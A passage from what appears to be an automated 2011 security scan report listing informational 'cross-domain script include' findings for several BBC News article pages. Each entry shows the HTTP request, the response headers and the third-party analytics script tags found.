User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=702
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.3. http://www.bbc.co.uk/news/business-12435838  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=728
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.4. http://www.bbc.co.uk/news/business-12437194  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=788
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.5. http://www.bbc.co.uk/news/education-12429152  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=765
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.6. http://www.bbc.co.uk/news/entertainment-arts-12426999  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=755
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.7. http://www.bbc.co.uk/news/entertainment-arts-12427905  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.8. http://www.bbc.co.uk/news/entertainment-arts-12428196  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.9. http://www.bbc.co.uk/news/health-12401970  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=764
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.10. http://www.bbc.co.uk/news/health-12409700  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:45 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:02:45 GMT
Connection: close
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.11. http://www.bbc.co.uk/news/health-12415801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:46 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:02:46 GMT
Connection: close
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.12. http://www.bbc.co.uk/news/magazine-12392811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The response dynamically includes the following scripts from other domains:

Request

